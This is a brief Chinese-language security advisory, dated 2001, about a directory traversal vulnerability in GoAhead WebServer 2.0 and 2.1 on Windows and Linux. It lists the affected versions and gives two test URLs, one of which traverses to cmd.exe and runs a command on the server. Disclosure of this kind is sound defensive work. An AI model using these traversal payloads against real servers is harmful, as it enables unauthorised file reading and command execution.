|
|
GoAhead WebServer存在目录遍历漏洞
发布时间:2001-02-08
更新时间:2001-02-08
严重程度:中
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:服务器模式
受影响系统受影响系统:
GoAhead Software GoAhead WebServer 2.1
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- Microsoft Windows CE 3.0
- Microsoft Windows CE 2.0
- Linux kernel 2.3
GoAhead Software GoAhead WebServer 2.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
- Microsoft Windows CE 3.0
- Microsoft Windows CE 2.0 详细描述
如果给GOAHEAD WEB服务程序请求一特殊的
URL,如带'..\'的请求文件名,就可能导致攻击者执行任意代码或者查看任意文件。
测试代码
http://target/..\..\..\..\..\..\filename
http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
解决方案
尚无
相关信息
|
